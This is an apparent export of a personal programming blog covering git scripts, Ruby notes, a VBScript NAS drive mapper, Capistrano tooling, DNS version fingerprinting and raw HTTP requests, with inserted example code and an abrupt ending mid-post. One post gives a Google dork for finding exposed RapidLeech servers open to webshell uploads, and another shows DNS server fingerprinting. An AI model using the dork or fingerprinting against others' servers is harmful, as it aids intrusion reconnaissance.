tag:blogger.com,1999:blog-264186192024-03-13T00:58:54.491+00:00codeBurstIt's the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man.
VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.comBlogger47125tag:blogger.com,1999:blog-26418619.post-91409800725958046162011-11-03T15:31:00.001+00:002011-11-03T15:31:27.680+00:00<div dir="ltr" style="text-align: left;" trbidi="on">
bin/git-truncate 33174e010f5c586ecd89ce47067f796b751989f5
<br />
<pre><code>#!/bin/bash
# usage: git-truncate refhashtag
# Makes the commit given as $1 the new root of master: everything before it is dropped,
# everything after it is replayed on top of a fresh root commit that carries the same tree.
set -e
[ -n "$1" ] || { echo "usage: git-truncate <commit>" >&2; exit 1; }
git rev-parse --verify "$1^{commit}" >/dev/null   # refuse to run on a bad ref
git checkout --orphan temp "$1"
git commit -m "Truncated history"
git rebase --onto temp "$1" master
git branch -D temp
</code></pre>
<br />Everything after the given commit gets a new hash, so existing clones and tags stop matching and any signatures on the replayed commits are gone; the result has to be force-pushed and everyone re-clones.<br />
</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-51901894880896100792011-10-27T13:39:00.001+00:002011-11-03T15:29:08.746+00:00<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="post-text">
I've been using git for a while and forget some things.. so for the sake of repeating the internet.<br />
<br />
<b>Revert Working Copies</b><br />
<br />
For a specific file use (the <code>--</code> keeps git from reading the path as a branch name):<br />
<br />
<pre><code>git checkout -- path/to/file/to/revert
</code></pre>
<br />
For all unstaged changes to tracked files under the current directory use (staged changes and untracked files are left alone):<br />
<pre><code>git checkout -- .
</code></pre>
<br />
Make sure to include the period at the end.<br />
<br />
<b>Merge in remote</b> <br />
<br />
<pre><code>git checkout master
git remote add username git://github.com/username/repo.git
git fetch username
git merge username/master-or-branch-name
git push origin master</code></pre><br />
The git:// protocol has no transport authentication or encryption, so anyone on the path can hand you different objects; use https:// or ssh for anything you are going to merge and push. Fetching first, rather than pulling, is what gives you the chance to look at the incoming commits before they touch master.<br />
<b>Update existing remote</b>
<br />
<pre>shadowbq@thaw:~/snorby_suite$ git remote
origin
shadowbq@thaw:~/snorby_suite$ git fetch origin
remote: Counting objects: 5, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 3 (delta 2), reused 0 (delta 0)
Unpacking objects: 100% (3/3), done.
From github.com:shadowbq/snorby_suite
33174e0..7109d83 master -> origin/master
shadowbq@thaw:~/snorby_suite$ git merge origin/master
Updating 33174e0..7109d83
Fast-forward
TODO.md | 14 +++++++-------
1 files changed, 7 insertions(+), 7 deletions(-)
</pre>
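<br />The truncate recipe from the previous post and the fetch-and-merge steps above, driven end to end as an added example (my code, not the author's): it builds throw-away repositories under Dir.mktmpdir with a made-up identity (demo@example.invalid), truncates a five-commit history at commit 3 and checks what survived, then fetches a contributor's clone as a remote, lists the incoming commits before merging, and merges. Only git on PATH is needed.

```ruby
require 'open3'
require 'tmpdir'

# Run one git command in +dir+ and return its combined output; raise on failure.
# Identity and signing are forced with -c so ~/.gitconfig cannot change the outcome.
def git(dir, *args)
  out, status = Open3.capture2e(
    'git', '-c', 'user.name=demo', '-c', 'user.email=demo@example.invalid',
    '-c', 'commit.gpgsign=false', *args, chdir: dir
  )
  raise "git #{args.join(' ')} failed:\n#{out}" unless status.success?
  out
end

# Fresh repository whose master branch carries +count+ single-file commits (constructed data).
def make_repo(dir, count)
  git(dir, 'init', '-q')
  git(dir, 'symbolic-ref', 'HEAD', 'refs/heads/master')  # branch is master whatever init.defaultBranch says
  count.times do |n|
    File.write(File.join(dir, "file#{n + 1}.txt"), "change #{n + 1}\n")
    git(dir, 'add', "file#{n + 1}.txt")
    git(dir, 'commit', '-q', '-m', "commit #{n + 1}")
  end
end

def commit_count(dir, ref = 'master')
  git(dir, 'rev-list', '--count', ref).strip.to_i
end

# bin/git-truncate, one command per step: an orphan branch rooted at +root+ gets a
# fresh first commit with root's tree, then every commit after root is replayed on it.
def git_truncate(dir, root)
  git(dir, 'checkout', '-q', '--orphan', 'temp', root)
  git(dir, 'commit', '-q', '-m', 'Truncated history')
  git(dir, 'rebase', '-q', '--onto', 'temp', root, 'master')
  git(dir, 'branch', '-D', 'temp')
end

# Truncate a five-commit repository at commit 3 and report what is left.
def truncate_demo
  Dir.mktmpdir('truncate') do |dir|
    make_repo(dir, 5)
    root      = git(dir, 'rev-parse', 'master~2').strip   # commit 3 of 5
    old_first = git(dir, 'rev-parse', 'master~4').strip   # commit 1, which must disappear
    git_truncate(dir, root)
    {
      commits_after:      commit_count(dir),                          # "Truncated history" + commit 4 + commit 5
      files_kept:         Dir.glob(File.join(dir, 'file*.txt')).size, # tree content survives
      old_root_reachable: git(dir, 'rev-list', 'master').include?(old_first),
    }
  end
end

# Merge-in-remote: clone, commit as the contributor, then fetch the clone as a remote,
# look at what is incoming, and merge. A filesystem path is the remote URL here; for a
# real remote use https or ssh, since git:// has no transport authentication.
def merge_demo
  Dir.mktmpdir('merge') do |base|
    upstream = File.join(base, 'upstream')
    contrib  = File.join(base, 'contrib')
    Dir.mkdir(upstream)
    make_repo(upstream, 3)
    git(base, 'clone', '-q', upstream, contrib)
    File.write(File.join(contrib, 'patch.txt'), "contributed change\n")
    git(contrib, 'add', 'patch.txt')
    git(contrib, 'commit', '-q', '-m', 'contributor commit')

    git(upstream, 'checkout', '-q', 'master')
    git(upstream, 'remote', 'add', 'contributor', contrib)
    git(upstream, 'fetch', '-q', 'contributor')
    incoming = git(upstream, 'log', '--oneline', 'master..contributor/master').lines.map(&:strip)
    touched  = git(upstream, 'diff', '--stat', 'master...contributor/master')
    git(upstream, 'merge', '-q', 'contributor/master')
    {
      incoming:          incoming,                  # one line per commit the merge brings in
      touches_patch_txt: touched.include?('patch.txt'),
      commits_after:     commit_count(upstream),    # 3 + 1
    }
  end
end

if __FILE__ == $0
  p truncate_demo
  p merge_demo
end
```

Two things the checks make visible: after a truncate the tree is intact but every commit is a new object, so existing clones and tags stop matching and signatures made on the originals are gone; and the fetch/merge split is the review step, since nothing the remote sent touches your branch until you merge it.<br />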
</div>
</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-45661737558959178322010-02-22T13:16:00.001+00:002010-02-22T13:18:25.934+00:00A quick look at object_id in ruby.. <br />
<br />
<a href="http://www.oreillynet.com/ruby/blog/2006/02/ruby_values_and_object_ids.html">Ruby VALUEs and object_ids</a> @oreillynet has a detailed explanation of how the ids are assigned. The numbers below are not arbitrary: MRI stores small integers as tagged immediate values whose id is 2n+1 (so 0, 1 and 2 give 1, 3 and 5); true, false and nil are fixed constants (2, 0 and 4 here, from MRI 1.9 and earlier; 64-bit MRI 2.0 and later reports 20, 0 and 8); and each evaluation of a string literal creates a new heap object, which is why "".object_id changes between calls while @foo keeps the same id for as long as it holds the same object.<br />
<br />
<div id="code">irb(main):001:0> "".object_id<br />
=> 23653260<br />
irb(main):002:0> "".object_id<br />
=> 23649800<br />
irb(main):003:0> 1.object_id<br />
=> 3<br />
irb(main):004:0> 0.object_id<br />
=> 1<br />
irb(main):005:0> 2.object_id<br />
=> 5<br />
irb(main):006:0> true.object_id<br />
=> 2<br />
irb(main):007:0> false.object_id<br />
=> 0<br />
irb(main):008:0> nil.object_id<br />
=> 4<br />
irb(main):009:0> @foo = 1<br />
=> 1<br />
irb(main):010:0> @foo.object_id<br />
=> 3<br />
irb(main):011:0> @foo.object_id<br />
=> 3<br />
irb(main):012:0> @foo = " "<br />
=> " "<br />
irb(main):013:0> @foo.object_id<br />
=> 23612570<br />
irb(main):014:0> @foo.object_id<br />
=> 23612570<br />
</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-57962880336285183582010-02-11T17:29:00.000+00:002010-02-11T17:29:17.111+00:00pcaprubPcaprub was very fractured throughout the ruby community so I merged many of the projects together. This is the new hotness. :)<br />
<br />
<span><b>gem install pcaprub</b></span><br />
<br />
Requirements:<br />
<br />
libpcap - http://www.tcpdump.org<br />
<br />
<a href="http://github.com/shadowbq/pcaprub">http://github.com/shadowbq/pcaprub</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-14609499545064892632009-08-05T12:09:00.001+00:002009-08-05T12:12:24.413+00:00VBS Script to map NAS network smb drives over specific SSID wifi homenets (non GPO script)I recently posted this script on <a href="http://groups.google.com/group/microsoft.public.scripting.vbscript/browse_thread/thread/0161a82e4779e2eb/f1aedc258a5a433a?#f1aedc258a5a433a">usenet</a> because so many people now<br />have NAS storage devices accessible via their home wifi networks.<br /><br />This script should help the people asking how to mount a network attached storage device (like my coolmax NAS) into their Windows profile during Windows boot.<br /><br />This VBScript queries two WMI classes: MSNdis_80211_ServiceSetIdentifier in the root\wmi namespace for the SSID the wireless adapter is associated with, and Win32_NetworkAdapter in root\cimv2 for the adapter's connection status.<br /><br />You need to have the local WMI service enabled for this to work.<br /><br />FYI: This has been tested under Windows XP.<br /><br />Two caveats before trusting it: matching the SSID is a convenience check, not authentication, since anyone can broadcast the same SSID and then answer the name lookup for \\storage with their own host; and the share credentials sit in cleartext in the script, so keep them to a guest or read-only account as shown.<br /><br /><div id="code"><pre>
'file: nasmapper.vbs
'launch with "cscript c:\nasmapper.vbs //nologo" -> /programs/startup
'VBS Script to map NAS over wifi homenets (non GPO script)

'Shadowbq - 2009 BSD License
'Reference Functions: ScriptGuy! (MS), quiet_lurker (neowin), Aaron P(neowin)

Option Explicit

Dim objWMIService, objNet
Dim intSleep, WNICName, knownSSID, retries, maxRetries
Dim mapDrive, mapLocation, mapUsername, mapPassword

knownSSID = "URWP80"                                          'SSID of Hotspot that has mapped location
WNICName = "Dell Wireless 1470 Dual Band WLAN Mini-PCI Card"  'Nic name listed in WMI
maxRetries = 10                  'maxRetries * intSleep/1000 ~= total possible seconds
intSleep = 2000                  'wait cycles
mapDrive = "Y:"                  'Map to Drive
mapLocation = "\\storage\public" 'Location of Share
mapUsername = "Guest"            'User Account for Share
mapPassword = ""                 'User Password for Share

'If you're having problems finding the WNICName you can use the
'\\root\wmi call ("Select * From MSNdis_80211_Configuration") to flip
'through all wireless devices..

Private Sub GetWMI(WMIArray, WMIQuery, WMIRoot)
    'On error resume Next
    Dim WMIClass

    Set WMIClass = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\" & WMIRoot)
    If Not (WMIClass Is Nothing) Then Set WMIArray = WMIClass.ExecQuery(WMIQuery)
End Sub

Function SSID()
    'On error resume Next
    Dim objSSIDSet, objSSID, ID, i

    Call GetWMI(objSSIDSet, "Select * from MSNdis_80211_ServiceSetIdentifier Where active=true", "wmi")

    For Each objSSID In objSSIDSet
        ID = ""
        'Ndis80211SsId is a byte array: bytes 0-3 hold the SSID length, the SSID itself starts at byte 4
        For i = 0 To objSSID.Ndis80211SsId(0) - 1
            ID = ID & Chr(objSSID.Ndis80211SsId(i + 4))
        Next
        SSID = ID
    Next
End Function

Function WNICStatus()
    Dim colItems, objItem, strStatus

    Call GetWMI(colItems, "Select * from Win32_NetworkAdapter where Name = '" & WNICName & "'", "cimv2")

    For Each objItem In colItems
        Select Case objItem.NetConnectionStatus
            Case 0:  strStatus = "Disconnected"
            Case 1:  strStatus = "Connecting"
            Case 2:  strStatus = "Connected"
            Case 3:  strStatus = "Disconnecting"
            Case 4:  strStatus = "Hardware not present"
            Case 5:  strStatus = "Hardware disabled"
            Case 6:  strStatus = "Hardware malfunction"
            Case 7:  strStatus = "Media disconnected"
            Case 8:  strStatus = "Authenticating"
            Case 9:  strStatus = "Authentication succeeded"
            Case 10: strStatus = "Authentication failed"
            Case 11: strStatus = "Invalid address"
            Case 12: strStatus = "Credentials required"
        End Select
    Next

    WNICStatus = strStatus
End Function

Function fnMapNetworkDrive(Drive, Path, Uname, Upass)
    Dim i, oDrives
    Set objNet = WScript.CreateObject("WScript.Network")
    Set oDrives = objNet.EnumNetworkDrives
    'EnumNetworkDrives alternates drive letter, UNC path, drive letter, UNC path...
    For i = 0 To oDrives.Count - 1 Step 2
        'Remove an existing mapping on the same letter first
        If oDrives.Item(i) = Drive Then
            WScript.Echo "Removing drive: " & Drive
            objNet.RemoveNetworkDrive Drive, True, True
        End If
    Next
    WScript.Echo "Mapping drive: " & Drive & " to path: " & Path
    objNet.MapNetworkDrive Drive, Path, False, Uname, Upass
    fnMapNetworkDrive = "[completed mapping drive]"
    Set oDrives = Nothing
End Function

Dim nicStatus, nicSSID

WScript.Echo "NAS Wifi Mapper"
WScript.Echo "=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
WScript.Echo "[Checking NIC Status]"

nicStatus = WNICStatus()
retries = 0

While (StrComp(nicStatus, "Connected") <> 0)
    If (retries < maxRetries) Then
        retries = retries + 1
        WScript.Echo "Nic " & nicStatus & ".."
        WScript.Sleep intSleep
        nicStatus = WNICStatus()
    Else
        WScript.Echo "*** Max # of connection attempts reached"
        WScript.Quit 1
    End If
Wend
WScript.Echo "Connected .. continuing"

WScript.Echo "[Checking SSID Status]"
nicSSID = SSID()

WScript.Echo "SSID: " & nicSSID

If (StrComp(nicSSID, knownSSID) = 0) Then
    WScript.Echo "[Correct SSID]"
Else
    Dim errDescription, errSource
    errSource = "NAS Mapper"
    errDescription = "Incorrect SSID for network share to be established"
    WScript.Echo "An Error:'" & errDescription & "' by '" & errSource & "'."
    WScript.Quit 8
End If

WScript.Echo "[Mapping Drive] "
WScript.Echo fnMapNetworkDrive(mapDrive, mapLocation, mapUsername, mapPassword)

WScript.Quit
</pre></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com2tag:blogger.com,1999:blog-26418619.post-58518663574274532872008-09-26T15:49:00.003+00:002008-09-26T16:01:52.379+00:00Command Line Capistrano Forked<div id="code"><pre>
#!/usr/local/bin/ruby

# Command Line Capistrano Forked
# (Forked version)
# written by Scott MacGregor - 2008

require 'rubygems'
require 'capistrano/configuration'
require 'stringio'
require 'optparse'
require 'syslog'

# Gather list of hosts and create capistrano role string
def monitorlist(hostlist)
  commandstring = "role :sensor, "
  if hostlist.respond_to? :last
    hostlist.each do |hosttarget|
      hosttarget == hostlist.last ? commandstring << "\"#{hosttarget.strip}\"" : commandstring << "\"#{hosttarget.strip}\", "
    end
  else
    commandstring << "\"#{hostlist.strip}\""
  end
  return commandstring
end

# Perform desired logging method
def logit(outputIO, logmethod)
  if logmethod
    Syslog.open('monitord')
    outputIO.string.each_line do |line|
      # ignore monitord information lines
      next if line.include?("[monitord]")

      # strip out tty special characters
      # ^\[[33m
      line.gsub!(/\^\[\[[0-9]+m/, "")
      # \e[37m
      line.gsub!(/\e\[[0-9]+m/, "")
      # \033[31m
      line.gsub!(/\\[0-9]+\[[0-9]+m/, "")

      # strip out preceding stars
      line.gsub!(/^\s*[*]*/, "")

      line.strip!

      # uncomment this line if you want STDOUT while SYSLOGING
      # p line

      if line.downcase.include?("fail")
        Syslog.crit(line)
      else
        Syslog.notice(line)
      end
    end
  end
end

# Run Forked Process; returns the child's pid so the caller can reap it
def tick(queryhost, outputIO, logmethod)
  pid = fork {
    pidhost = Capistrano::Configuration.new
    if OPTIONS[:syslog]
      pidhost.logger = Capistrano::Logger.new(:output => outputIO)
    else
      pidhost.logger = Capistrano::Logger.new
    end
    pidhost.load(File.dirname(File.expand_path(__FILE__)) + "/capfile")
    pidhost.load(:string => monitorlist(queryhost.strip))

    # pidhost.set :user, 'capistrano'
    # pidhost.ssh_options[:username] = 'monitord'
    # pidhost.ssh_options[:host_key] = 'ssh-dsa'
    # pidhost.ssh_options[:paranoid] = false   # leave host-key checking on; turning it off invites MITM

    pidhost.logger.level = OPTIONS[:debug_level]
    begin
      # Call the Capistrano Namespace & command to fork
      pidhost.monitor.default
    rescue Exception => e
      puts "\t[" + queryhost.strip + "] " + " Failed to establish connection."
      outputIO.puts "\t[" + queryhost.strip + "] " + " Failed to establish connection."
    end

    logit(outputIO, logmethod)
  }
  pid
end

# Set default options and initializations
OPTIONS = {
  :file => "monitorlist",
  :syslog => false,
  :debug_level => 0,
  :dest => File.expand_path(File.dirname($0)),
  :hostslist => ""
}
hosts = []

# Read Command Line Options
ARGV.options do |o|
  script_name = File.basename($0)

  o.set_summary_indent(' ')
  o.banner = "Usage: #{script_name} [OPTIONS]"
  o.define_head "Run capistrano command forked from outside capistrano with additional options.\nWritten by: Scott MacGregor 2008"

  o.separator ""
  o.separator "Monitord options:"
  o.on("-R", "--read=[val]", String,
       "Read monitor host list from file",
       "Default: #{OPTIONS[:file]}") { |v| OPTIONS[:file] = v }
  o.on("-L", "--hosts=[val]", String,
       "List of comma separated hosts. Encased in double quotes.", "(*OVERRIDES -R option)") { |v| OPTIONS[:hostslist] = v }
  o.on("-S", "--syslog",
       "SYSLOG all output") { OPTIONS[:syslog] = true }

  o.separator ""
  o.separator "Common Usage: "
  o.separator "\t./monitord --hosts=\"hostname1, hostname2\""
  o.separator "\t./monitord -R \"customhosts.txt\""

  o.separator ""
  o.separator "Common options:"
  o.on("--debug=[0-3]", Integer,
       "Debug verbosity level",
       "Default: #{OPTIONS[:debug_level]}") { |v| OPTIONS[:debug_level] = v }
  o.on_tail("-h", "--help", "Show this help message.") { puts o; exit }

  begin
    o.parse!
  rescue OptionParser::InvalidOption => e
    abort "-h --help Show this help message."
  end
end

if OPTIONS[:hostslist] == ""
  # Read standard Capistrano Role string configuration file (role :name, "host1", "host2").
  File.open(File.dirname(File.expand_path(__FILE__)) + "/#{OPTIONS[:file]}").each_line { |line|
    next if line =~ /^\s*#/ or not line.include?(",")
    hosts = line[(line.index(",") + 2)..-1].gsub("\"", "").strip.split(',')
  }
else
  # Read env option string
  hosts = OPTIONS[:hostslist].split(',')
end

# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Begin Main Loop

outputIO = StringIO.new
logmethod = OPTIONS[:syslog]

pids = []
for host in hosts
  pids << tick(host.strip, outputIO, logmethod)
end

# Reap every child so the script does not exit (or leave zombies) before the forked runs finish.
pids.each { |pid| Process.waitpid(pid) }

# End Main Loop
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
</pre></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-54885814337427309532008-07-28T18:16:00.005+00:002008-07-28T23:06:07.168+00:00DNS version attempts & toolsThere has been some DNS junk flying around again.. so refresh.<br /><br />Don't forget how easy it is to ask a server for its version:<div id="code"><br />dig @ns.example.com -c CH -t txt version.bind<br /></div><br /><br />Make sure your BIND/named answers that query with a custom string, or refuses it (in BIND 9, version none; disables the query):<br /><br /><div id="code"><br />options<br />{<br /> version "Generic DNS Server";<br />}<br /></div><br /><br />Not that it helps much with fpdns around: fpdns fingerprints the server by how it responds to crafted queries, not by the banner, so hiding the version only stops the lazy query.<br /><div id="code"><br />anonymous@:~$ fpdns -D google.com<br />fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 -- 8.4.4<br />fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 -- 8.4.4<br /></div><br /><a href="http://code.google.com/p/fpdns/source/browse/trunk/trunk/Fingerprint.pm">Perl: (Fingerprint.PM)</a><br /><br /><br />Make sure you read basic DNS guidance such as <br /><br /><a href="http://www.cisco.com/web/about/security/intelligence/dns-bcp.html">Cisco's: DNS Best Practices, Network Protections, and Attack Identification</a><br /><br />And understand the principles laid out in secure BIND configurations such as:<br /><a href="http://www.cymru.com/Documents/secure-bind-template.html">http://www.cymru.com/Documents/secure-bind-template.html</a><br /><br />Look into 
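the tools listed after this example.<br /><br />First, an added worked example (mine, not from the post) of what that dig command actually sends and what comes back: the CH/TXT query for version.bind built by hand, and a parser for the TXT answer, run against a response constructed here to look like a server configured with version "Generic DNS Server". It needs no network; the query id 0x1234 and the response bytes are made up for the example.

```ruby
# Wire format per RFC 1035: 12-byte header, question (name, type, class),
# answers as (name, type, class, ttl, rdlength, rdata). CHAOS class is 3, TXT type is 16.
QTYPE_TXT = 16
QCLASS_CH = 3

# Encode a dotted name as length-prefixed labels: "version.bind" -> "\x07version\x04bind\x00"
def encode_name(name)
  name.split('.').map { |label| [label.length, label].pack('Ca*') }.join + "\x00"
end

# Header plus one question. The id is caller supplied so the output is reproducible;
# a real client must choose it (and the source port) unpredictably, per RFC 5452.
def build_version_query(id, name = 'version.bind', qtype = QTYPE_TXT, qclass = QCLASS_CH)
  flags = 0x0100  # QR=0 (query), opcode QUERY, RD set, which is what dig sends by default
  header = [id, flags, 1, 0, 0, 0].pack('n6')  # id, flags, qdcount, ancount, nscount, arcount
  header + encode_name(name) + [qtype, qclass].pack('nn')
end

# Read a name starting at +offset+, following compression pointers (0xC0xx, RFC 1035 4.1.4).
# Returns [name, offset_just_after_the_name_in_the_current_section].
def read_name(msg, offset)
  labels = []
  next_offset = nil
  loop do
    len = msg.getbyte(offset)
    if (len & 0xC0) == 0xC0            # two-byte pointer with a 14-bit offset
      pointer = ((len & 0x3F) << 8) | msg.getbyte(offset + 1)
      next_offset ||= offset + 2
      offset = pointer
    elsif len == 0                      # root label ends the name
      next_offset ||= offset + 1
      break
    else
      labels << msg[offset + 1, len]
      offset += len + 1
    end
  end
  [labels.join('.'), next_offset]
end

# Parse a response and return the TXT records of the answer section.
def parse_txt_answers(msg)
  _id, flags, qdcount, ancount = msg.unpack('n4')
  raise 'not a response (QR bit clear)' if (flags & 0x8000) == 0
  offset = 12
  qdcount.times do                      # skip the echoed question(s)
    _name, offset = read_name(msg, offset)
    offset += 4                         # qtype + qclass
  end
  answers = []
  ancount.times do
    name, offset = read_name(msg, offset)
    type, klass, _ttl, rdlength = msg[offset, 10].unpack('nnNn')
    offset += 10
    rdata = msg[offset, rdlength]
    offset += rdlength
    next unless type == QTYPE_TXT
    # TXT rdata is a sequence of <length byte><bytes> character-strings
    strings = []
    pos = 0
    while pos < rdata.bytesize
      slen = rdata.getbyte(pos)
      strings << rdata[pos + 1, slen]
      pos += slen + 1
    end
    answers << { name: name, qclass: klass, txt: strings }
  end
  answers
end

# Constructed response for query id 0x1234, as BIND answers with version "Generic DNS Server":
# flags QR|AA|RD|RA, one question, one answer whose name is a pointer back to the question name.
def sample_version_response
  txt = 'Generic DNS Server'
  rdata = [txt.length, txt].pack('Ca*')
  header = [0x1234, 0x8580, 1, 1, 0, 0].pack('n6')
  question = encode_name('version.bind') + [QTYPE_TXT, QCLASS_CH].pack('nn')
  answer = "\xC0\x0C".b + [QTYPE_TXT, QCLASS_CH, 0, rdata.bytesize].pack('nnNn') + rdata
  header + question + answer
end

if __FILE__ == $0
  q = build_version_query(0x1234)
  puts "query (#{q.bytesize} bytes): #{q.unpack('H*').first}"
  parse_txt_answers(sample_version_response).each do |a|
    puts "#{a[:name]} CH TXT #{a[:txt].inspect}"
  end
end
```

The parser follows compression pointers because BIND writes the answer name as a pointer back to the question; a parser that only handles literal labels breaks on the very first real response. Send the same query with qclass 1 (IN) and you will see why the class matters: version.bind only exists in CHAOS.<br /><br />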
DNS debugging tools such as <a href="http://sourceforge.net/projects/dnswalk/">DNSwalk</a>, <a href="http://www.freshports.org/dns/dlint/">dlint</a> and <a href="http://www.shub-internet.org/brad/dns/">DOC</a>.<br /><br />For reverse lookups where there is no PTR record, try a passive cache of observed A records such as:<br />Passive DNS Replication @<br /><a href="http://cert.uni-stuttgart.de/stats/dns-replication.php?">http://cert.uni-stuttgart.de/stats/dns-replication.php</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-67734125211307719732008-06-05T15:02:00.005+00:002008-06-05T15:50:38.628+00:00Simple http get request... snooze.Let's get some basic headers using sbd.exe, nc, telnet, whatever..<br /><br /><div id="code">telnet www.microsoft.com 80<br />nc www.microsoft.com 80<br />sbd -c off www.microsoft.com 80<br /></div><br /><br />Type a request line (GET, OPTIONS, PUT, POST, HEAD or TRACE), the Host header, then a blank line:<br />(HTTP/1.1 requires the Host header: a compliant server answers 400 without it, and it is what selects the site when several vhosts share one IP.)<br /><div id="code">GET / HTTP/1.1<br />Host: www.microsoft.com<br />Press Enter twice<br /></div><br /><br />(Windows telnet lameness.. 
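it does not echo what you type by default; the fix follows this example.)<br /><br />The same exchange from Ruby, as an added example that is not part of the post: a throw-away local server stands in for www.microsoft.com and the client sends the request above byte for byte. The stub does what a compliant HTTP/1.1 server must do when Host is missing (RFC 2616 section 14.23: answer 400), so the Host requirement can be observed rather than taken on faith. The 127.0.0.1 address and the stub's response headers are this example's assumptions.

```ruby
require 'socket'

# Read CRLF-terminated header lines up to the blank line; names are lower-cased.
def read_headers(io)
  headers = {}
  while (line = io.gets("\r\n")) && line != "\r\n"
    name, value = line.chomp.split(':', 2)
    headers[name.strip.downcase] = value.to_s.strip
  end
  headers
end

# Stand-in for the remote host: a one-request-per-connection HTTP/1.1 server on
# 127.0.0.1 with an ephemeral port. It answers 400 when an HTTP/1.1 request carries no
# Host header and 200 otherwise, echoing the Host it saw. Returns [server, port];
# closing the server stops the accept loop.
def start_stub_server
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  Thread.new do
    begin
      loop do
        client = server.accept
        request_line = client.gets("\r\n").to_s.chomp
        headers = read_headers(client)
        _method, _path, version = request_line.split(' ', 3)
        if version == 'HTTP/1.1' && !headers.key?('host')
          client.write "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"
        else
          client.write "HTTP/1.1 200 OK\r\nServer: stub/0.1\r\nX-Served-Host: #{headers['host']}\r\n" \
                       "Content-Length: 0\r\nConnection: close\r\n\r\n"
        end
        client.close
      end
    rescue IOError, Errno::EBADF
      # server.close from the main thread ends the loop
    end
  end
  [server, port]
end

# What the post types into telnet/nc, sent verbatim: request line, optional Host header,
# Connection: close, and the blank line ("press Enter twice") that ends the request.
# Returns [status_code, response_headers].
def raw_get(host, port, path = '/', send_host = true)
  lines = ["GET #{path} HTTP/1.1"]
  lines << "Host: #{host}" if send_host
  lines << 'Connection: close'
  sock = TCPSocket.new(host, port)
  sock.write(lines.join("\r\n") + "\r\n\r\n")
  status = sock.gets("\r\n").to_s.split(' ', 3)[1].to_i
  headers = read_headers(sock)
  sock.close
  [status, headers]
end

# The same request with and without Host, against the stub.
def host_header_demo
  server, port = start_stub_server
  with_host    = raw_get('127.0.0.1', port, '/', true)
  without_host = raw_get('127.0.0.1', port, '/', false)
  server.close
  { with_host: with_host, without_host: without_host }
end

if __FILE__ == $0
  host_header_demo.each { |label, (status, headers)| puts "#{label}: #{status} #{headers.inspect}" }
end
```

Against a real server the interesting part is the response headers: Server, X-Powered-By and friends are the same kind of banner the DNS post's version.bind query pulls, and the status code you get for an OPTIONS or TRACE request line tells you which methods the front end lets through.<br /><br />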
Turning on local echo:<div id="code">Type "Ctrl+]"<br />Type "set localecho"<br />Press Enter twice<br /></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-64915793990986879292008-04-27T04:51:00.006+00:002008-04-27T05:17:59.925+00:00Digg + Idiots + RapidShare = p0wn3d<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-f8vzruAp-wTDB9cgTX9F8azAToFtkMvTRFEtRwXJzEPI1t3eB05i_ExIp14_5VAaEs-gglVrFabNzzXGx-xSynzkC0LhTuBgBmMSgyGGQUunhQlaU9Nuo-Uf7e2G-yIA-Tbh/s1600-h/digg.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-f8vzruAp-wTDB9cgTX9F8azAToFtkMvTRFEtRwXJzEPI1t3eB05i_ExIp14_5VAaEs-gglVrFabNzzXGx-xSynzkC0LhTuBgBmMSgyGGQUunhQlaU9Nuo-Uf7e2G-yIA-Tbh/s400/digg.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5193788458383684050" /></a><br />God damn it.. dumb ideas just stay around for far too long.<br /><br />OK, we all know what rapidshare is. It's a waste of internet space. A couple of years ago somebody <span style="font-style:italic;">dugg</span> an article on a way around its restrictions using a server script called rapidleech. All in good fashion, but come on... you leave this open on an Apache server that executes PHP, and it lets anyone make your server fetch a file from any URL; that is a remote upload of r57.php, c99.php, c100.php or whatever webshell comes next, straight into your webroot. Renaming the file really helped, huh..? 
<br /><br />Just look at the multiversion google dork: <br />[2 years later and still 117+ zombies waiting to happen] <br /><a href="http://www.google.com/search?q=%22Bugs+Report+to+Rapidget.bug">"Bugs Report to Rapidget.bug"</a> <br /><br />Digg idiots: <a href="http://digg.com/tech_news/RapidLeech">http://digg.com/tech_news/RapidLeech</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-20724472461808833812008-04-16T21:05:00.002+00:002008-04-16T21:08:51.943+00:00Capistrano with highline menu.Example Capistrano file using the highline menu system.. <br /><br />(Capistrano really needs some better docs.)<br /><br /><div id="code"><br />#example capistrano menu using highline menu system <br /># Published under BSD license <br /># written by:shadowbq - http://shad0wbq.blogspot.com<br /># verified on: capistrano 2.2.0 & highline 1.4.0<br /><br />role :comps, "localhost"<br /><br />desc "Example Highline menu"<br />task :menu do<br /> Capistrano::CLI.ui.say("\nThis is with a different layout...")<br /> Capistrano::CLI.ui.choose 